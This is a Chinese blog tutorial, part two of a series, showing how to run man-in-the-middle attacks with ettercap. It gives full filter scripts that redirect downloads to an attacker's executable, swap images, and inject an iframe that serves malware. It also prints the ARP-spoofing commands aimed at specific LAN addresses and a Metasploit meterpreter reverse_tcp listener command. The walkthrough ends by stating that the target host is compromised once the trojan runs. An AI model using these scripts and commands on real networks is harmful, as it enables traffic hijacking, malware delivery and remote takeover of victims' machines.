首页    技术博客    PHP教程    数据库技术    前端开发   HTML5    Nginx    php论坛
新用户注册 | 会员登录
加入会员,解锁专属内容
取消
热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

MITM(中间人攻击)原理及防范初探(二)

作者:伊丽汇 | 来源:互联网 | 2024-11-22 12:46
上一篇文章MITM(中间人攻击)原理及防范初探(一)给大家介绍了利用ettercap进行arp欺骗及劫持明文口令,后来我发现好友rootoorotor的文章介绍比我写的更透彻,所以基础利用大家可以参看





上一篇文章
MITM(中间人攻击)原理及防范初探(一)给大家介绍了利用ettercap进行arp欺骗及劫持明文口令,后来我发现好友
rootoorotor的文章介绍比我写的更透彻,所以基础利用大家可以参看他的博文~很棒哦~

这次我会给大家着重介绍在进行MITM时使用到的一个强大的嗅探工具——ettercap


0x00ettercap介绍


0x01ettercap欺骗规则建立


0×02攻击举例


0×03利用ettercap挂马 


————————————————分割线————————————————————————–


0x00ettercap介绍


ettercap是linux下(win下也有)一个异常强大的欺骗工具,可以为你快速建立和发送伪造数据包,级别从网络适配器到各种app不等,也能从本地端口鉴定绑定的数据包,反正要多牛逼就有多牛逼


大家可以从http://ettercap.sourceforge.net/download.php下载


在下载安装包后,到下载的目录分别执行


#./configure&&make&&make install
#./configure&&make&&make plug-ins
#./configure&&make&&make plug-ins_install


win下无脑安装就不做详解了


0x01ettercap欺骗规则建立


工欲善其事必先利其器,我们先为自己的ettercap建立欺骗规则


默认规则如下:


1


当然,你也可以建立自己的规则,比如:



# replace rmccurdy with your website
# replace the url with what ever exe you like


if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, “Accept-Encoding”)) {
replace(“Accept-Encoding”, “Accept-Rubbish!”);
# note: replacement string is same length as original string
msg(“zapped Accept-Encoding!n”);
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(“keep-alive”, “close” “);
replace(“Keep-Alive”, “close” “);


}


if (ip.proto == TCP && search(DATA.data, “: application”) ){
# enable for logging log(DECODED.data, “/tmp/log.log”);
msg(“found EXEn”);
# “Win32″ is the first part of the exe example:
# if the EXE started with “this program must be run in MSDOS mode” you could search for MSDOS etc ..
if (search(DATA.data, “Win32″)) {
msg(“doing nothingn”);
} else {
replace(“200 OK”, “301 Moved Permanently
Location: http://你自己的地址.exe
“);
msg(“redirect successn”);


}
}
这个规则大概是说,把80端口所请求的数据包换成了自己的exe,这是个win32的可执行文件,然后你可以通过MSF生产一个TCP后门啥的,就把这个地址换到location这里,然后用命令


etterfilter alert.filter -o alert.e


进行编译,这里的详细操作可以参考rootoorotor同学的第二篇笔记的一段,他描述的比我详细,也举例写了一个规则


在编译完成后执行


ettercap -T -q -i vboxnet0 -F exe.ef -M ARP

即可进行欺骗

0×02攻击举例


如果你感兴趣,可以参考这里的脚本进行编译


这个脚本实现的功能是改变80端口所请求的图片,并用本地图片替换之


脚本如下:


if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=https://img.php1.cn/3cd4a/1eebe/cd5/45a090220e38e09d.webp\" ");
replace("IMG SRC=", "img src=https://img.php1.cn/3cd4a/1eebe/cd5/45a090220e38e09d.webp\" ");
msg("Filter Ran.\n");
}


编译一下试试~


2


然后键入命令


ettercap -T -q -i wlan0 -F change.ef -M ARP:remote /172.16.1.31/ /172.16.1.1/


(11是我的本机,31是攻击目标)


3


之后被攻击者通过80端口请求的任一图片都会被替换(我换成了我的,嘿嘿)


4


0×03利用ettercap挂马


当然,想要利用ettercap挂马也是可以的,真是狂拽炫酷叼(额,因为网内都是宿舍的同学,我就不挂马了,但是介绍一下方法给大家)


if (ip.proto == TCP && ip.dst != '192.1.1.200' && tcp.dst == 80 || tcp.dst == 8080) {


#…and if it contains an Accept-Encoding header…


if (search(DATA.data, “Accept-Encoding”)) {


#…remove any Encoding (make sure we are using plain text)


replace(“Accept-Encoding”, “Accept-Nothing!”);


}


}


#–Inject Iframe–


if (ip.proto == TCP && ip.dst != ’192.1.1.200′ && tcp.src == 80 || tcp.src == 8080) {


if (search(DATA.data, “”)){


#Replace it with the body tag and an iframe to our attacking webpage


replace(“”,”


msg(“iframe injected after\n”);


}


if (search(DATA.data, “”)){


replace(“”,”


msg(“iframe injected after\n”);


}


}
利用MSF修改马儿的地址,然后用同样的方法编译脚本


找一个不用的端口号监听,例如


msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=172.16.1.31 LPORT=1024 E

如此即监听1024草榴端口(咦,有奇怪的东西混进去了)


然后用ettercap调用脚本


ettercap -Tq -i wlan0 -F /usr/share/ettercap/刚刚编译的文件地址-M arp:remote /172.16.1.31  /172.16.1.11/


执行后目标主机会下载你的后门,和之前我说道的TCP后门产生的效果一样,然后目标运行了网马后你就成功入侵了目标主机











推荐阅读
  • install

    Nginx 反向代理与负载均衡实验

    Nginx 反向代理与负载均衡实验
    本实验旨在通过配置 Nginx 实现反向代理和负载均衡,确保从北京本地代理服务器访问上海的 Web 服务器时,能够依次显示红、黄、绿三种颜色页面以验证负载均衡效果。 ... [详细]
  • timezone

    解决编译BSP包时遇到的 'gets' 未声明错误

    在编译BSP包过程中,遇到了一个与 'gets' 函数相关的编译错误。该问题通常发生在较新的编译环境中,由于 'gets' 函数已被弃用并视为安全漏洞。本文将详细介绍如何通过修改源代码和配置文件来解决这一问题。 ... [详细]
  • timezone

    CentOS 7.6环境下Prometheus与Grafana的集成部署指南

    CentOS 7.6环境下Prometheus与Grafana的集成部署指南
    本文旨在提供一套详细的步骤,指导读者如何在CentOS 7.6操作系统上成功安装和配置Prometheus 2.17.1及Grafana 6.7.2-1,实现高效的数据监控与可视化。 ... [详细]
  • install

    Coursera ML 机器学习

    Coursera ML 机器学习
    2019独角兽企业重金招聘Python工程师标准线性回归算法计算过程CostFunction梯度下降算法多变量回归![选择特征](https:static.oschina.n ... [详细]
  • regex

    实用正则表达式有哪些

    实用正则表达式有哪些
    小编给大家分享一下实用正则表达式有哪些,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下 ... [详细]
  • install

    PHP数组操作与Visual Studio Code中创建PHP文件的方法

    本文详细介绍了如何在PHP中进行数组删除、清空等操作,并提供了在Visual Studio Code中创建PHP文件的步骤。 ... [详细]
  • install

    无屏幕环境下树莓派4B的安装与配置指南

    本文将详细介绍如何在没有显示器的情况下,使用Raspberry Pi Imager为树莓派4B安装操作系统,并进行基本配置,包括设置SSH、WiFi连接以及更新软件源。 ... [详细]
  • install

    搭建Jenkins、Ant与TestNG集成环境

    搭建Jenkins、Ant与TestNG集成环境
    本文详细介绍了如何在Ubuntu 16.04系统上配置Jenkins、Ant和TestNG的集成开发环境,涵盖从安装到配置的具体步骤,并提供了创建Windows Slave节点及项目构建的指南。 ... [详细]
  • default

    Django Token 认证详解与 HTTP 401、403 状态码的区别

    Django Token 认证详解与 HTTP 401、403 状态码的区别
    本文详细介绍了如何在 Django 中配置和使用 Token 认证,并解释了 HTTP 401 和 HTTP 403 状态码的区别。通过具体的代码示例,帮助开发者理解认证机制及权限控制。 ... [详细]
  • list

    iOS BLE应用后台持续扫描与连接问题分析

    本文探讨了在iOS平台上开发BLE(蓝牙低功耗)应用程序时遇到的挑战,特别是如何实现应用在后台模式下仍能持续扫描并连接蓝牙设备。文章提供了具体的配置方法和常见的问题解决方案。 ... [详细]
  • regex

    前端开发:使用JavaScript获取最近7天、半年和一年的日期格式化方法

    本文介绍了如何在React和React Native项目中使用JavaScript进行日期格式化,提供了获取近7天、近半年及近一年日期的具体实现方法。 ... [详细]
  • install

    Linux环境下进程间通信:深入解析信号机制

    Linux环境下进程间通信:深入解析信号机制
    本文详细探讨了Linux系统中信号的生命周期,从信号生成到处理函数执行完毕的全过程,并介绍了信号编程中的注意事项和常见应用实例。通过分析信号在进程中的注册、注销及处理过程,帮助读者理解如何高效利用信号进行进程间通信。 ... [详细]
  • install

    云服务器环境配置指南:Nginx、Tomcat、JDK与MySQL的安装与设置

    本文详细介绍了如何在云服务器上配置Nginx、Tomcat、JDK和MySQL。涵盖从下载、安装到配置的完整步骤,帮助读者快速搭建Java Web开发环境。 ... [详细]
  • default

    Java 中的不可变集合与同步集合详解

    本文将详细探讨 Java 中提供的不可变集合(如 `Collections.unmodifiableXXX`)和同步集合(如 `Collections.synchronizedXXX`)的实现原理及使用方法,帮助开发者更好地理解和应用这些工具。 ... [详细]
  • install

    深入理解Java类加载机制与自定义类加载器

    本文详细探讨了Java中的ClassLoader类加载器的工作原理,包括其如何将class文件加载至JVM中,以及JVM启动时的动态加载策略。文章还介绍了JVM内置的三种类加载器及其工作方式,并解释了类加载器的继承关系和双亲委托机制。 ... [详细]
author-avatar
伊丽汇
这个家伙很懒,什么也没留下!
Tags | 热门标签
RankList | 热门文章
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有